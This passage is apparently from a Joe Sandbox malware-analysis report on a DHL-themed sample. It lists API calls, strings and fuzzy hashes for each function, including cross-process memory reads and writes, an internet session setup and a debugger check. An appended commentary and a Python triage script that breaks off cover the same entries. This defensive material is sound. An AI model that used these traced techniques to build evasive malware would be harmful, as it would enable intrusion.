                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 1045663743-2594219639
                                                                                        • Opcode ID: 57794de4b797662c4843bb4ca47fb1f3d90cf62d956b4fc57bf1a94955fcc106
                                                                                        • Instruction ID: 4cf3182794c92afebe629f262430ae1d212e0c4c2c8aae23b47b790f5801df79
                                                                                        • Opcode Fuzzy Hash: 57794de4b797662c4843bb4ca47fb1f3d90cf62d956b4fc57bf1a94955fcc106
                                                                                        • Instruction Fuzzy Hash: 2E216035901128FBDF21DBA4DC81FDDBBB8FF09311F1001A5F959A71A0EA705A85DB94
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C86761
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C8676C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: 25e054b74f7d4157f418a4034eebab5cfecc3696a1407db2b1012d7aa09a6b23
                                                                                        • Instruction ID: c4afef510e774f56ee295dd002993a2928de43418a162278f904558cd757aa93
                                                                                        • Opcode Fuzzy Hash: 25e054b74f7d4157f418a4034eebab5cfecc3696a1407db2b1012d7aa09a6b23
                                                                                        • Instruction Fuzzy Hash: C5118275210208AFEF11AF54DC81FAB376AEB4836CF104129F92497290D6719D5197A4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 0-2594219639
                                                                                        • Opcode ID: 6a4844d9e684655e7fa52e46bf7bf97a5d12fb21c3ade5df3800591aac502743
                                                                                        • Instruction ID: 18b73c59a759506fdcfd7b941b819da43e3e0f92e0a8809bb884247431062031
                                                                                        • Opcode Fuzzy Hash: 6a4844d9e684655e7fa52e46bf7bf97a5d12fb21c3ade5df3800591aac502743
                                                                                        • Instruction Fuzzy Hash: 8A218135124118BFEF10AF54CC45FBA77E4EB09318F584165FA22DA1E0D671EA50DB68
                                                                                        APIs
                                                                                          • Part of subcall function 00C01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C01D73
                                                                                          • Part of subcall function 00C01D35: GetStockObject.GDI32(00000011), ref: 00C01D87
                                                                                          • Part of subcall function 00C01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C01D91
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C86C71
                                                                                        • GetSysColor.USER32(00000012), ref: 00C86C8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: 8cd0989abb25e513e48b0c66724d54ac729f08e1a5c21de4736609ea5b1f15b0
                                                                                        • Instruction ID: e6299ea4088bbbd3eadf60aefc0345d7870e2f51982c6cd7df6e104258b9d4a9
                                                                                        • Opcode Fuzzy Hash: 8cd0989abb25e513e48b0c66724d54ac729f08e1a5c21de4736609ea5b1f15b0
                                                                                        • Instruction Fuzzy Hash: 572129B2610209AFDF04EFA8CC45EEE7BA8FB08319F004629FD95D2250D635E851DB64
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62A22
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C62A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 41914b95247ec920101f4916205e2f871adfabe48834f76df8b88a4d02a44b03
                                                                                        • Instruction ID: 081148bc916050f9b10394aabad09fd0a3f981a45272eded9c25255d346b1ed0
                                                                                        • Opcode Fuzzy Hash: 41914b95247ec920101f4916205e2f871adfabe48834f76df8b88a4d02a44b03
                                                                                        • Instruction Fuzzy Hash: 05119072901914ABDB30DFD8D884BEEB7A8AB45314F144025E8A5F7291D7B0AE0AE791
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C7222C
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C72255
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 1b5aa11d147e49bff330d945a80cceb1dd3bb50607feb5f03e7827d4a729cc9e
                                                                                        • Instruction ID: e84396d26a00e689aab24f554fb9befa1985acdd49951995de839d35dc9eda51
                                                                                        • Opcode Fuzzy Hash: 1b5aa11d147e49bff330d945a80cceb1dd3bb50607feb5f03e7827d4a729cc9e
                                                                                        • Instruction Fuzzy Hash: D111C270541225BADB258F52CC84FFBFBACFF1A761F10C22AF92986101D6709A95D6F0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,?,?,?), ref: 00C88530
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 564170adba64cf5d931e55d745289b2f8885ad25336e235e56e3244b7f9cb5ad
                                                                                        • Instruction ID: 8169b85c3425e54a37c3fa5b3533b7f4e3bc85b12165bc8711e607fe12fd356c
                                                                                        • Opcode Fuzzy Hash: 564170adba64cf5d931e55d745289b2f8885ad25336e235e56e3244b7f9cb5ad
                                                                                        • Instruction Fuzzy Hash: 39210375A00209EFCF05EF98D840CAE7BB5FB4D344B404258FD12A7360DA31AE65DBA4
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00C8662C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u$button
                                                                                        • API String ID: 3850602802-1762282863
                                                                                        • Opcode ID: b293f9d99764bcb5d3b8f666584153cebe8f0cad8ff1083e182c366cb08b6070
                                                                                        • Instruction ID: e55c6e6102cc9548201049933a464f43e6edac07e4be7bfb21e94fbc2fbd0cfd
                                                                                        • Opcode Fuzzy Hash: b293f9d99764bcb5d3b8f666584153cebe8f0cad8ff1083e182c366cb08b6070
                                                                                        • Instruction Fuzzy Hash: 4C110432150209ABDF11AF60CC11FEA376AFF08318F144218FE61A7190D776EC91AB14
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00C878D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 839a4b3390f1361410c3c114a62ee2a4a04936cb77cd956222a0ed35f74bdd61
                                                                                        • Instruction ID: cc87810640de873ea704b6b163d6dd72301bf821db33312cc0ae4fba19878e49
                                                                                        • Opcode Fuzzy Hash: 839a4b3390f1361410c3c114a62ee2a4a04936cb77cd956222a0ed35f74bdd61
                                                                                        • Instruction Fuzzy Hash: BF11B130504744AFDB21DF34C891AE7B7E9BF05314F20861DE8AA57291EB7169419B60
                                                                                        APIs
                                                                                          • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
                                                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C59509
                                                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C5952E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MemoryProcessWrite
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 1195347164-2594219639
                                                                                        • Opcode ID: 33c719c6b91acc39c8e84a9dc95fa6b0e298084d766bbdd02fd3ff884d5117d5
                                                                                        • Instruction ID: 7ac6d222d38943d598010e565a387f77d40c46d67ec202656fa729714f837714
                                                                                        • Opcode Fuzzy Hash: 33c719c6b91acc39c8e84a9dc95fa6b0e298084d766bbdd02fd3ff884d5117d5
                                                                                        • Instruction Fuzzy Hash: FE010832900218EBDB21AF24DC86FEEBB78DB04311F10026AF915A7191EA706E95DB60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock_memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 1988441806-3962188686
                                                                                        • Opcode ID: 75c1e2e0b2cf3487a5318d68d6c8b0b953b6383259a9867d58d3b09d11053fd7
                                                                                        • Instruction ID: fa076ed7735a9bbf6272fbd380b3b3a6e8649ca157d7e8a9b81f4d09b7fc9461
                                                                                        • Opcode Fuzzy Hash: 75c1e2e0b2cf3487a5318d68d6c8b0b953b6383259a9867d58d3b09d11053fd7
                                                                                        • Instruction Fuzzy Hash: 6B01F9719042287EDB28CAA8D856EFE7BFCDB11301F00419BF552D2181E875E6089760
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00C595FB
                                                                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00C5962E
                                                                                          • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MemoryProcessRead_memmove
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 339422723-2594219639
                                                                                        • Opcode ID: 77fba038347c261ae1610e35f0650f963884ae0729cd05c8e43f035afeb3d809
                                                                                        • Instruction ID: bcc3dfd2fdc1821f4a9f0663b8874003601720ebd3b18775056b1f9310a872e1
                                                                                        • Opcode Fuzzy Hash: 77fba038347c261ae1610e35f0650f963884ae0729cd05c8e43f035afeb3d809
                                                                                        • Instruction Fuzzy Hash: 8A015B75900118AFDB60AE50CC81ED977BCEB14341F9081AABA4996151DE315E89EF90
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00C3B93A,?,?,?), ref: 00C8C5F1
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00C8C5D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 982171247-2594219639
                                                                                        • Opcode ID: 9bb61ba738c013553da81f9f19859f664b0ac47e0ea86c2354b2d401b2184f9d
                                                                                        • Instruction ID: 8c3ccca959690a04b9b20d12a7b15b9b1fee74a78f5f00448aad757fa0dbe2c7
                                                                                        • Opcode Fuzzy Hash: 9bb61ba738c013553da81f9f19859f664b0ac47e0ea86c2354b2d401b2184f9d
                                                                                        • Instruction Fuzzy Hash: 4101B531200614ABCF216F14CC98F6A3BA6FB85768F140128F9511B2E1CB31B952EB64
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C5954C
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59564
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 67fd542eb13285a9f8e03042cf87abf50b2086d388843358bd9079b23239ffe4
                                                                                        • Instruction ID: 5c6e1e88b584ad8c36b212ddee4f0ee67885bfe55a4e320a539c8421c060199a
                                                                                        • Opcode Fuzzy Hash: 67fd542eb13285a9f8e03042cf87abf50b2086d388843358bd9079b23239ffe4
                                                                                        • Instruction Fuzzy Hash: 75E02339341321F6F23116654C4AFD71F15DB48BA2F540134FF01550D1E5E10DD653A4
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C59CD8
                                                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C59D08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: d78fb51e56b960bab88552ec68176cee1c831915ccf5408b25c2a0564c2ab9ca
                                                                                        • Instruction ID: 17f487aa449669a9dcc303049d160680e15bc65af601ddc9cfbf353639bedb1d
                                                                                        • Opcode Fuzzy Hash: d78fb51e56b960bab88552ec68176cee1c831915ccf5408b25c2a0564c2ab9ca
                                                                                        • Instruction Fuzzy Hash: 77F0A735240314BBEA156A50DC46FDA3B68EB18752F200128FB051A0E1D5E25D80A7A8
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: 76f1af8cd18f726f1154ad8efd7b48d50f193bea4bc2ce57030dad96c16298dc
                                                                                        • Instruction ID: ffd1b402b9fe8b29ca6c5295b412d789f32bc52298e43614aaef33ba86471ed6
                                                                                        • Opcode Fuzzy Hash: 76f1af8cd18f726f1154ad8efd7b48d50f193bea4bc2ce57030dad96c16298dc
                                                                                        • Instruction Fuzzy Hash: 52E0D8326002382BE7209B99EC49FABF7ACEB55B70F10006BFD04D3051D960AB45C7E1
                                                                                        APIs
                                                                                          • Part of subcall function 00C3B314: _memset.LIBCMT ref: 00C3B321
                                                                                          • Part of subcall function 00C20940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C3B2F0,?,?,?,00C0100A), ref: 00C20945
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00C0100A), ref: 00C3B2F4
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C0100A), ref: 00C3B303
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C3B2FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 3158253471-631824599
                                                                                        • Opcode ID: 590137be70d5c71fb19466585e11c61a300f78799977f9f1967fe38626464563
                                                                                        • Instruction ID: 4ff2d67a9200e6b67bbb1f5d88bb44e2ded6534c91299e94d0f09591f579110c
                                                                                        • Opcode Fuzzy Hash: 590137be70d5c71fb19466585e11c61a300f78799977f9f1967fe38626464563
                                                                                        • Instruction Fuzzy Hash: 33E092F02107218FDB60EF28E4047467BE4AF00308F10893DE496C7661EBB4E884CBA1
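The function entries above are the kind of listing an analyst scans by hand: the WriteProcessMemory and ReadProcessMemory subcalls paired with SendMessageW, and the IsDebuggerPresent/OutputDebugStringW pair. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses a constructed excerpt written in the same listing format (refs copied from the entries on this page), groups calls per function entry, decodes the common-control message IDs passed to SendMessageW (0x102B is LVM_SETITEMSTATE, 0x1073 is LVM_GETITEMTEXTW, 0x110A is TVM_GETNEXTITEM) and tags API combinations worth a closer look. The rule sets, tag names and message table are the example's own choices. Two caveats a practitioner should carry along: memory access paired with LVM_* messages is the standard way one process reads or selects items in another process's list-view control and is present in the AutoIt runtime for that reason, so it is scored as a combination rather than as a bare foreign-process write; and the IsDebuggerPresent/OutputDebugStringW pair here is the stock ATL CAtlBaseModule constructor, as its own string says, which is why the output keeps the call arguments.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not part of the report)."""
import re
from typing import Dict, List

# Constructed excerpt in the report's own listing format; refs copied from the page.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
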